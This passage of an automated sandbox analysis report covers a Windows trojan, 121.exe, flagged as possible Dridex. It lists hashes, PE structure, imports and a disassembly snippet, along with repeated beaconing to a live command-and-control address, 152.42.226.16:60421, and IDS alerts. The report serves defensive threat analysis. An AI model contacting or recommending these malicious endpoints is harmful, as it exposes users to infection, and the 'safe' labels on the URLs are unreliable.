00000000.00000003.2215047117.00000000000F6000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2941581497.00000000000F6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://152.42.226.16:60421/caEdh121.exe, 00000000.00000003.3951714993.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://152.42.226.16:60421/caIdd121.exe, 00000000.00000003.4307921187.000000000011B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://152.42.226.16/121.exe, 00000000.00000002.4495724989.000000000008C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://152.42.226.16:60421/caOdb121.exe, 00000000.00000003.2185358392.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2215028734.000000000011A000.00000004.00000020.00020000.00000000.sdmp, 121.exe, 00000000.00000003.2213683301.000000000011A000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                152.42.226.16
                		unknownUnited States
                		81NCRENUStrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1581040
                Start date and time:2024-12-26 19:27:05 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 29s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:4
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:121.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 15
                • Number of non-executed functions: 162
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • VT rate limit hit for: 121.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                13:27:58API Interceptor13872838x Sleep call for process: 121.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                152.42.226.167W3KSFhWbw.elfGet hashmaliciousUnknownBrowse
                  3K6iey8Gan.elfGet hashmaliciousUnknownBrowse
                    yA6XZfl1zU.elfGet hashmaliciousUnknownBrowse

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      NCRENUSxd.sh4.elfGet hashmaliciousMiraiBrowse
                      • 152.50.51.184
                      xd.mpsl.elfGet hashmaliciousMiraiBrowse
                      • 204.87.8.87
                      telnet.ppc.elfGet hashmaliciousUnknownBrowse
                      • 152.36.142.178
                      loligang.arm7.elfGet hashmaliciousMiraiBrowse
                      • 152.12.73.251
                      nklmpsl.elfGet hashmaliciousUnknownBrowse
                      • 152.28.215.100
                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      • 152.9.28.133
                      arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      • 198.86.164.26
                      spc.elfGet hashmaliciousMirai, MoobotBrowse
                      • 152.45.109.36
                      star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                      • 152.10.107.176
                      https://shibe-rium.net/Get hashmaliciousUnknownBrowse
                      • 152.42.156.84

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                      Entropy (8bit):7.2998021988289725
                      TrID:
                      • Win64 Executable (generic) (12005/4) 74.80%
                      • Generic Win/DOS Executable (2004/3) 12.49%
                      • DOS Executable Generic (2002/1) 12.47%
                      • VXD Driver (31/22) 0.19%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                      File name:121.exe
                      File size:328'704 bytes
                      MD5:3b8f4ae6dd1ef9625f8ba8f6c9eb8515
                      SHA1:d3dbc4f0348dce6c99dba536f8e86deb707be6ab
                      SHA256:f3ea334bb3adf2fabae612dd6155d15a05e5e1998a1d9d7b326e42ac4291c57e
                      SHA512:96deb5213595a0fecebb6cbf27ae709d71a3615ee898d90d63092530f1087830274e70b8ad55ba5ffade537c04604c9fa60696c01307bc9f4e77743fd7cc54b2
                      SSDEEP:6144:ron77DDqry02A5s5pGqV8t+b3ewQTT9oe+rpHmGG/RX5NfCF3h2Gkk2l:0DGrL2A5OxO9oe+rFGzNK3h9
                      TLSH:33649EE4B1BA68DBCFED433880D6C69C71255AD1D4263C7732B57B28ACDDD36080AD62
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p......cD........ ............................

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0x4014c0
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                      DLL Characteristics:
                      Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                      TLS Callbacks:0x401ba0
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:147442e63270e287ed57d33257638324

                      Entrypoint Preview

                      Instruction
                      dec eax
                      sub esp, 28h
                      dec eax
                      mov eax, dword ptr [0004EFF5h]
                      mov dword ptr [eax], 00000001h
                      call 00007F7AE8B389BFh
                      call 00007F7AE8B381AAh
                      nop
                      nop
                      dec eax
                      add esp, 28h
                      ret
                      nop word ptr [eax+eax+00000000h]
                      nop dword ptr [eax]
                      dec eax
                      sub esp, 28h
                      dec eax
                      mov eax, dword ptr [0004EFC5h]
                      mov dword ptr [eax], 00000000h
                      call 00007F7AE8B3898Fh
                      call 00007F7AE8B3817Ah
                      nop
                      nop
                      dec eax
                      add esp, 28h
                      ret
                      nop word ptr [eax+eax+00000000h]
                      nop dword ptr [eax]
                      dec eax
                      sub esp, 28h
                      call 00007F7AE8B39E54h
                      dec eax
                      test eax, eax
                      sete al
                      movzx eax, al
                      neg eax
                      dec eax
                      add esp, 28h
                      ret
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      dec eax
                      lea ecx, dword ptr [00000009h]
                      jmp 00007F7AE8B384D9h
                      nop dword ptr [eax+00h]
                      ret
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      nop
                      dec eax
                      jmp ecx
                      dec eax
                      arpl word ptr [00002AC2h], ax
                      test eax, eax
                      jle 00007F7AE8B38528h
                      cmp dword ptr [00002ABBh], 00000000h
                      jle 00007F7AE8B3851Fh
                      dec eax
                      mov edx, dword ptr [00052CFEh]
                      dec eax
                      mov dword ptr [ecx+eax], edx
                      dec eax
                      mov edx, dword ptr [00052CFBh]

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x540000x8d8.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x510000x2b8.pdata
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x500600x28.rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x542240x1e8.idata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x20a80x2200ba98beafce4128c14539a20f3e854b25False0.5734145220588235data6.010394259460846IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data0x40000x4bcf00x4be00cf292f62555c0cdae19dae4fa133a740False0.6267150175041186data7.30160607800781IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rdata0x500000x9100xa005fcc7830b4dcd602b35eeb7f1712e8faFalse0.241796875data4.459688665734325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .pdata0x510000x2b80x400f88aef14dea168f37249daf0dce04c78False0.37890625data3.2311971178670404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .xdata0x520000x2380x4006ce9e303fb86766d702ecb2b174cf348False0.2578125data2.6337753778508075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .bss0x530000x9d00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata0x540000x8d80xa003aae8d98b4d34bad008e73a14573bffdFalse0.323828125data3.966749721413537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .CRT0x550000x680x20052d79e9aecf5d5c3145d3ec54aa197a8False0.0703125data0.2709192282599745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .tls0x560000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Imports

                      DLLImport
                      KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
                      msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-12-26T19:28:01.673606+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549704152.42.226.1660421TCP
                      2024-12-26T19:28:07.561196+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549707152.42.226.1660421TCP
                      2024-12-26T19:28:13.409204+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549710152.42.226.1660421TCP
                      2024-12-26T19:28:19.377507+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549715152.42.226.1660421TCP
                      2024-12-26T19:28:25.256835+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549727152.42.226.1660421TCP
                      2024-12-26T19:28:31.327154+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549744152.42.226.1660421TCP
                      2024-12-26T19:28:37.157879+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549758152.42.226.1660421TCP
                      2024-12-26T19:28:43.783419+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549775152.42.226.1660421TCP
                      2024-12-26T19:28:49.678477+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549789152.42.226.1660421TCP
                      2024-12-26T19:28:55.588585+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549802152.42.226.1660421TCP
                      2024-12-26T19:29:01.456300+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549821152.42.226.1660421TCP
                      2024-12-26T19:29:07.535213+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549833152.42.226.1660421TCP
                      2024-12-26T19:29:14.096183+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549850152.42.226.1660421TCP
                      2024-12-26T19:29:19.931428+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549864152.42.226.1660421TCP
                      2024-12-26T19:29:26.206541+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549877152.42.226.1660421TCP
                      2024-12-26T19:29:32.159250+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549894152.42.226.1660421TCP
                      2024-12-26T19:29:38.062491+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549908152.42.226.1660421TCP
                      2024-12-26T19:29:44.081306+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549926152.42.226.1660421TCP
                      2024-12-26T19:29:49.995684+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549942152.42.226.1660421TCP
                      2024-12-26T19:29:55.909580+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549957152.42.226.1660421TCP
                      2024-12-26T19:30:01.910442+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549974152.42.226.1660421TCP
                      2024-12-26T19:30:07.860082+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.549988152.42.226.1660421TCP
                      2024-12-26T19:30:13.817298+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550005152.42.226.1660421TCP
                      2024-12-26T19:30:19.803151+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550019152.42.226.1660421TCP
                      2024-12-26T19:30:25.829058+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550035152.42.226.1660421TCP
                      2024-12-26T19:30:31.881327+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550049152.42.226.1660421TCP
                      2024-12-26T19:30:37.723474+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550054152.42.226.1660421TCP
                      2024-12-26T19:30:43.582932+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550057152.42.226.1660421TCP
                      2024-12-26T19:30:49.464020+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550060152.42.226.1660421TCP
                      2024-12-26T19:30:55.445758+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550063152.42.226.1660421TCP
                      2024-12-26T19:31:01.288625+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550066152.42.226.1660421TCP
                      2024-12-26T19:31:07.098896+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550069152.42.226.1660421TCP
                      2024-12-26T19:31:13.399828+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550072152.42.226.1660421TCP
                      2024-12-26T19:31:19.241638+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550075152.42.226.1660421TCP
                      2024-12-26T19:31:25.037680+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550078152.42.226.1660421TCP
                      2024-12-26T19:31:30.865630+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550081152.42.226.1660421TCP
                      2024-12-26T19:31:36.927590+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550084152.42.226.1660421TCP
                      2024-12-26T19:31:42.740586+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550087152.42.226.1660421TCP
                      2024-12-26T19:31:48.599640+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550090152.42.226.1660421TCP
                      2024-12-26T19:31:54.641776+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550093152.42.226.1660421TCP
                      2024-12-26T19:32:00.493646+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550096152.42.226.1660421TCP
                      2024-12-26T19:32:06.302485+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.550099152.42.226.1660421TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Dec 26, 2024 19:27:58.900827885 CET4970460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:27:59.020543098 CET6042149704152.42.226.16192.168.2.5
                      Dec 26, 2024 19:27:59.020658016 CET4970460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:27:59.028898954 CET4970460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:27:59.149002075 CET6042149704152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:01.673485994 CET6042149704152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:01.673605919 CET4970460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:01.673733950 CET4970460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:01.674523115 CET4970560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:01.793701887 CET6042149704152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:01.794644117 CET6042149705152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:01.794769049 CET4970560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:01.795511007 CET4970560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:01.915194988 CET6042149705152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:04.497292995 CET6042149705152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:04.497380972 CET4970560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:04.497625113 CET4970560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:04.498301029 CET4970660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:04.618073940 CET6042149705152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:04.618699074 CET6042149706152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:04.618886948 CET4970660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:04.618923903 CET4970660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:04.729857922 CET4970760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:04.739629030 CET6042149706152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:04.739723921 CET4970660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:04.851074934 CET6042149707152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:04.851185083 CET4970760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:04.851645947 CET4970760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:04.973197937 CET6042149707152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:07.561115980 CET6042149707152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:07.561196089 CET4970760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:07.561333895 CET4970760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:07.573715925 CET4970860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:07.680814981 CET6042149707152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:07.693263054 CET6042149708152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:07.693340063 CET4970860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:07.693582058 CET4970860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:07.813914061 CET6042149708152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:10.391969919 CET6042149708152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:10.392051935 CET4970860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:10.392129898 CET4970860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:10.405137062 CET4970960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:10.511830091 CET6042149708152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:10.524960041 CET6042149709152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:10.525062084 CET4970960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:10.525197029 CET4970960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:10.636240959 CET4971060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:10.645256996 CET6042149709152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:10.645325899 CET4970960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:10.756150961 CET6042149710152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:10.756257057 CET4971060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:10.756851912 CET4971060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:10.876445055 CET6042149710152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:13.409122944 CET6042149710152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:13.409204006 CET4971060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:13.409399986 CET4971060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:13.420092106 CET4971160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:13.529928923 CET6042149710152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:13.539611101 CET6042149711152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:13.539705038 CET4971160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:13.540189028 CET4971160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:13.659671068 CET6042149711152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:16.244065046 CET6042149711152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:16.244127989 CET4971160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:16.244232893 CET4971160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:16.256722927 CET4971460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:16.363842964 CET6042149711152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:16.376341105 CET6042149714152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:16.376672029 CET4971460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:16.376672029 CET4971460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:16.496500015 CET6042149714152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:16.496855021 CET6042149714152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:16.497026920 CET4971460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:16.498785973 CET4971560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:16.618339062 CET6042149715152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:16.618541956 CET4971560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:16.619187117 CET4971560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:16.738780022 CET6042149715152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:19.377414942 CET6042149715152.42.226.16192.168.2.5
                      Dec 26, 2024 19:28:19.377506971 CET4971560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:28:19.377629042 CET4971560421192.168.2.5152.42.226.16
